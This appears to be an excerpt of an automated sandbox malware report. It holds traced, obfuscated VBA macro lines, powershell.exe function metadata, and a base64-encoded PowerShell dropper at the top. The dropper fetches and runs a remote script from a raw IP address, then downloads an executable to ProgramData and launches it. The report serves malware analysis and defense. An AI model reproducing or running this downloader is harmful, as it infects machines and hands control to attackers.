JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=

            AlternativeText

            CInt

            executed
            81

            lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)

            ZcCmWkkqqB

            CBool

            Len("\x14\x07") -> 2

            ChrW

            LenB

            Trim

            CxtsBzHdKBGmb

            executed
            82

            gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)

            GgRgBdCqvLXk

            CBool

            Len(" \x03") -> 2

            ChrW

            LenB

            Trim

            ZxkaZVpVviNG

            executed
            85

            XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)

            kkfQTPTJpjjs

            CBool

            Len(" \x01") -> 2

            ChrW

            LenB

            Trim

            bvfFxpHJWlX

            executed
            87

            rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)

            DbfBblNVjZrSd

            CBool

            Len("\x14\x06") -> 2

            ChrW

            LenB

            Trim

            jfPdPngPqkfl

            executed
            88

            PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)

            PDvGhnzPcxhD

            CBool

            Len(" \x01") -> 2

            ChrW

            LenB

            Trim

            JJLiShTtqxhXr

            executed
            93

            fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)

            mxpJbmSSQ

            CBool

            Len("\x12 ") -> 2

            ChrW

            LenB

            Trim

            RkVtwCRbFKwknG

            executed
            94

            dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)

            MvZcVWwwaGt

            CBool

            Len(" \x05") -> 2

            ChrW

            LenB

            Trim

            qNJnfcLpkQXcp

            executed
            96

            wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)

            mkaDKJfCfVRm

            CBool

            Len("\x0b\x05") -> 2

            ChrW

            LenB

            Trim

            GvivfXcsHC

            executed
            101

            End Sub

            Reset < >

              Analysis Process: powershell.exe PID: 2984 Parent PID: 668 powershell.exeCOMMON

              Executed Functions

              Function 000007FF00280A4D, Relevance: 1.3, Strings: 1, Instructions: 31COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.407933761.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: z#t
              • API String ID: 0-225707968
              • Opcode ID: ff7f1137b3b57dbc62ead6c73a19457c84f196de6cc991bc0e2c9b127a822824
              • Instruction ID: c6bd19652222f85aa4a72809d21aea39c08cdc86934f9132f8dcfe3388554470
              • Opcode Fuzzy Hash: ff7f1137b3b57dbc62ead6c73a19457c84f196de6cc991bc0e2c9b127a822824
              • Instruction Fuzzy Hash: E7F02270318B8C0FCB419B288884B68BBD1FB8F305F6902E9908ACB296CB348455C742
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions